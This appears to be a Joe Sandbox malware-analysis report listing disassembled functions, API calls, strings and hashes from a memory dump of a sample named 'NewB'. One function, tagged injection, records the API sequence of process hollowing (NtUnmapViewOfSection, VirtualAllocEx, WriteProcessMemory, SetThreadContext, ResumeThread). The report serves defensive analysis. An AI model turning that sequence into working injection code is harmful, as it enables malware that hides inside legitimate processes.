GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 001AC96B
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 001AC97C
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 001AC98D
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 001AC99E
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 001AC9AF
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001AC9C0
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 001AC9D1
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 001AC9E2
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 001AC9F3
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001ACA04
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001ACA15
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 001ACA26
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001ACA37
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001ACA48
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 001ACA59
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 001ACA6A
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 001ACA7B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 001ACA8C
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 001ACA9D
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 001ACAAE
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 001ACABF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 001ACAD0
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 001ACAE1
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 001ACAF2
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 001ACB03

Strings

kernel32.dll, xrefs: 001AC859
WaitForThreadpoolTimerCallbacks, xrefs: 001AC91C
FlsFree, xrefs: 001AC872
GetFileInformationByHandleEx, xrefs: 001AC9D7
InitializeConditionVariable, xrefs: 001ACA0A
WakeConditionVariable, xrefs: 001ACA1B
CreateEventExW, xrefs: 001AC8C7
SleepConditionVariableSRW, xrefs: 001ACA92
WakeAllConditionVariable, xrefs: 001ACA2C
CreateThreadpoolWork, xrefs: 001ACAA3
SubmitThreadpoolWork, xrefs: 001ACAB4
SleepConditionVariableCS, xrefs: 001ACA3D
LCMapStringEx, xrefs: 001ACAF8
FlsSetValue, xrefs: 001AC894
FlushProcessWriteBuffers, xrefs: 001AC971
CloseThreadpoolWait, xrefs: 001AC960
TryAcquireSRWLockExclusive, xrefs: 001ACA70
ReleaseSRWLockExclusive, xrefs: 001ACA81
CreateSemaphoreW, xrefs: 001AC8D8
GetCurrentPackageId, xrefs: 001AC9B5
FlsAlloc, xrefs: 001AC866
InitializeCriticalSectionEx, xrefs: 001AC8A5
SetThreadpoolWait, xrefs: 001AC94F
CloseThreadpoolWork, xrefs: 001ACAC5
InitializeSRWLock, xrefs: 001ACA4E
GetLocaleInfoEx, xrefs: 001ACAE7
CreateSymbolicLinkW, xrefs: 001AC9A9
SetThreadpoolTimer, xrefs: 001AC90B
CreateThreadpoolTimer, xrefs: 001AC8FA
InitOnceExecuteOnce, xrefs: 001AC8B6
CloseThreadpoolTimer, xrefs: 001AC92D
GetTickCount64, xrefs: 001AC9C6
CreateThreadpoolWait, xrefs: 001AC93E
SetFileInformationByHandle, xrefs: 001AC9E8
CompareStringEx, xrefs: 001ACAD6
FlsGetValue, xrefs: 001AC883
CreateSemaphoreExW, xrefs: 001AC8E9
GetCurrentProcessorNumber, xrefs: 001AC993
GetSystemTimePreciseAsFileTime, xrefs: 001AC9F9
AcquireSRWLockExclusive, xrefs: 001ACA5F
FreeLibraryWhenCallbackReturns, xrefs: 001AC982

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 144ebf787c7a67eb72274c4b1ac592326bd920ab9140d272151ca4c1a17e3895
Instruction ID: 308c3de6b6febefd9cdc67aa2d95f47fdb3421da4acf28224d7d91f665dea825
Opcode Fuzzy Hash: 144ebf787c7a67eb72274c4b1ac592326bd920ab9140d272151ca4c1a17e3895
Instruction Fuzzy Hash: CD615E71952B90BBC742BFF6AC8999E3BBAEB0D7923800556F205DA960D7F840C4CB54

Uniqueness

Uniqueness Score: -1.00%

Function 001960A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 150
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 001960C6
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0019612B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00196144
GetThreadContext.KERNEL32(?,00000000), ref: 0019615F
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00196183
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection), ref: 0019619E
GetProcAddress.KERNEL32(00000000), ref: 001961A5
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 001961CD
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 001961EE
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 00196231
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000), ref: 0019626D
SetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00196289
ResumeThread.KERNEL32(?,?,?,00000000), ref: 00196295
VirtualFree.KERNEL32(?,00000000,00008000), ref: 001962A3

Strings

, xrefs: 00196178
NtUnmapViewOfSection, xrefs: 00196194
ntdll.dll, xrefs: 00196199

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Process$Memory$ThreadVirtualWrite$AllocContextModule$AddressCreateFileFreeHandleNameProcReadResume
String ID: $NtUnmapViewOfSection$ntdll.dll
API String ID: 4232606500-1522589568
Opcode ID: 261bd29c01c9e277eca649f96c9878d243c9d438216b457491a21c3a63fce072
Instruction ID: 02c6e8a11fbce90fea6f2aea0dd6c2d9e9d2126877f1c8277a37a861e6e4bec9
Opcode Fuzzy Hash: 261bd29c01c9e277eca649f96c9878d243c9d438216b457491a21c3a63fce072
Instruction Fuzzy Hash: 57517F71A40718AFDB229F90DC85FEAB7B8FF48741F500094F609AA690D7B1A9D0CF54

Uniqueness

Uniqueness Score: -1.00%

Function 001B0F04 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 001B1007
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 001B1053

Part of subcall function 001B274E: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 001B2841

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 001B10BF
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 001B10DB
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 001B112F
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 001B115C
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 001B11B2

Strings

(, xrefs: 001B1013

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 67ceaaea4ebf468cdd26e239bf9441f81a9aec02093b06eba9423a690ba5a18f
Instruction ID: 84f3c9dce1fa669d2de01608e18333c84c53a854775a894a34e35a9ea01e6907
Opcode Fuzzy Hash: 67ceaaea4ebf468cdd26e239bf9441f81a9aec02093b06eba9423a690ba5a18f
Instruction Fuzzy Hash: ADB18D70A00615EFDB18CF68DDA0ABEBBB6FF58300F65416DE901AB655D730AD81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001B16F3 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B2DED: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 001B2E00

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 001B1705

Part of subcall function 001B2F00: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 001B2F2A
Part of subcall function 001B2F00: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 001B2F99

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 001B1837
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 001B1897
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 001B18A3
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 001B18DE
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 001B18FF
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 001B190B
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 001B1914
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 001B192C

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 1bce42260e3972105159abbcd3107988c3d1873ac5ac3ccb9c2a47dca35a1c42
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: C2814A71E00225AFCB18DFA8C5A4ABDB7F6FF48304B5646ADD405A7701CB30AD52CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00195370 Relevance: 10.8, APIs: 7, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71edb39f56f5f631765e3712a06cf49570c77b2b11932f740451c94cbb9a086a
Instruction ID: 902f1787f9d075c675c5ee4f5a8483e18a1cb33c0350482b6c65900bd557bd28
Opcode Fuzzy Hash: 71edb39f56f5f631765e3712a06cf49570c77b2b11932f740451c94cbb9a086a
Instruction Fuzzy Hash: 21B1E3B190020CAFDF25CF64CC84BEEBBBAEB44300F504669F905A7681DB749B84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001BED3B Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BED74

Part of subcall function 001B9022: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B9043

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 001BEDDA
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 001BEDF2
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 001BEDFF

Part of subcall function 001BE8A2: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 001BE8CA
Part of subcall function 001BE8A2: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 001BE962
Part of subcall function 001BE8A2: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 001BE96C
Part of subcall function 001BE8A2: Concurrency::location::_Assign.LIBCMT ref: 001BE9A0
Part of subcall function 001BE8A2: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 001BE9A8

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: f53480a527e1ea3345b25cd8c8f4558d5c0a639768189be7f4e246deeed290b3
Instruction ID: 598d791a5eb9029f5b5fb392cda81d061338f1b8e6be473e83fd53cbf07133ff
Opcode Fuzzy Hash: f53480a527e1ea3345b25cd8c8f4558d5c0a639768189be7f4e246deeed290b3
Instruction Fuzzy Hash: 7C51A375A00215DFCF24DFA0C895BEEB7B5AF54310F154069E9027B392CB71AE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D2467 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001D24E9
_free.LIBCMT ref: 001D250D
_free.LIBCMT ref: 001D269A
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001E6748), ref: 001D26AC
_free.LIBCMT ref: 001D2866

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: e259396d0a4966c9851f37dc27ebfa07be6de4defdb41fd59d73abd1d3dbf236
Instruction ID: f594dfd0a0c92323f637010a9f4704c46b370d01e0e6cc0c0a7fc7692a279c1a
Opcode Fuzzy Hash: e259396d0a4966c9851f37dc27ebfa07be6de4defdb41fd59d73abd1d3dbf236
Instruction Fuzzy Hash: 88C11471A00204ABDB24AF68DC51FBA7BB9AF76354F24415BE8A597382E731CE81C750

Uniqueness

Uniqueness Score: -1.00%

Function 001972F0 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,86BBC188), ref: 00197369
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001973D0
GetProcAddress.KERNEL32(00000000), ref: 001973D7

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 85a9dea0ce7de6b366f769b3cddddaef04571be1d9a8c999bc987bb4d5949eba
Instruction ID: 4e90b456f6b9afc0ad768c2b1a3c2b907141f70914520074896203fbfc1e2602
Opcode Fuzzy Hash: 85a9dea0ce7de6b366f769b3cddddaef04571be1d9a8c999bc987bb4d5949eba
Instruction Fuzzy Hash: A1513671D142089BDF14EB68DC897EDBB75EF45310F5042A8E809A72C2EB349EC08BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001C6B6B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001C6C63
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001C6C6D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001C6C7A

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: bebe9b1051e006e1d14d1c8c4c27e3394353cd530c6b8e430f4033031f10bd2e
Instruction ID: 16a6097a3db031ffdbf0e4ee45542b668250eb43ecf0346cc2ecac9a7bf8aaaf
Opcode Fuzzy Hash: bebe9b1051e006e1d14d1c8c4c27e3394353cd530c6b8e430f4033031f10bd2e
Instruction Fuzzy Hash: A331A5B59012289BCB21DF64D989B9DBBB4BF18310F5041DAE41CAB250E7709FC58F55

Uniqueness

Uniqueness Score: -1.00%

Function 001CDB5E Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5958c4a322d5711d6ae3bc910566932bb896424020fccfcf8d6785c5ee9e15e7
Instruction ID: 959f4dfe89741ca9151c8e0d0d5448adae6437e6a4d5557de4127c0495e6cbed
Opcode Fuzzy Hash: 5958c4a322d5711d6ae3bc910566932bb896424020fccfcf8d6785c5ee9e15e7
Instruction Fuzzy Hash: 75418375804218AEDF24DF69DC89FAABBB9AF65304F1442EDE41DA3211D7319E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 001ACC87 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 001ACC9A

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 6c14d77d083dab2e182c4526170aaaec290fec257697c919dd890f3e8cefcc88
Instruction ID: 4e6559e4be963b3698198c001a3d46d5576e096297dcb139368f0cf698d0bbc5
Opcode Fuzzy Hash: 6c14d77d083dab2e182c4526170aaaec290fec257697c919dd890f3e8cefcc88
Instruction Fuzzy Hash: 59B09232A039308B8A122B54BC489ADB7A99B49AA131B0156DA01AB628CB501CC18BC4

Uniqueness

Uniqueness Score: -1.00%

Function 001ADE0F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001DE1B,001AD84A), ref: 001ADE14

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e24d9ef5a72b39db1f8bd82e1e9a873f9cf6af9de3879ddf1d8876bdcb063193
Instruction ID: 3d67c8867cb98f0a4d9b7da79c882c3db3057c39cfc0a6656c034bb4ae04189a
Opcode Fuzzy Hash: e24d9ef5a72b39db1f8bd82e1e9a873f9cf6af9de3879ddf1d8876bdcb063193
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 001CEDB4 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 001CEDB4

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
